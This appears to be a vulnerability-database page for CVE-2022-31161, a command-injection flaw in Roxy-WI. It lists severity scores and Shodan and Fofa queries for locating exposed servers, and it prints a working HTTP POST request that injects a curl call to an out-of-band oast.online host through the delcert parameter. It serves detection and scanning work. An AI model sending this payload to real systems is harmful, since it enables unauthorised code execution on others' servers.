🔙 목록으로 돌아가기

CVE-2022-31161: Roxy-WI - Remote Code Execution

TitleRoxy-WI - Remote Code Execution
Authorritikchaddha
SeverityCritical
ImpactSuccessful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.
RemediationUsers are advised to upgrade to latest version.
CVSS Score9.8
EPSS Score0.84279
CVE IDCVE-2022-31161
CWE IDCWE-78
Shodan Queryhtml:"Roxy-WI"
Fofa Querybody="roxy-wi"
Tags cve2022 cve rce roxy roxy-wi vkev vuln

🔍 Vulnerability Description

Roxy-WI before 6.1.1.0 is susceptible to remote code execution. System commands can be run remotely via the delcert parameter without proper input validation in the /app/options.py file, allowing attackers to inject arbitrary OS commands.

🌐 HTTP Request

POST /app/options.py HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Windows NT 6.2; Win64; x64; rv:109.0) Gecko/20100101 Firefox/112.0
Connection: close
Content-Length: 130
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Encoding: gzip

show_versions=1&token=&alert_consumer=notNull&serv=127.0.0.1&delcert=a%20&%20curl%20d5jmg1ple0o43r5beat0p4xf58nedkqo7.oast.online;

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2022/CVE-2022-31161.yaml

🦈 Packet Capture: ⬇️ Download cve-2022-31161.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A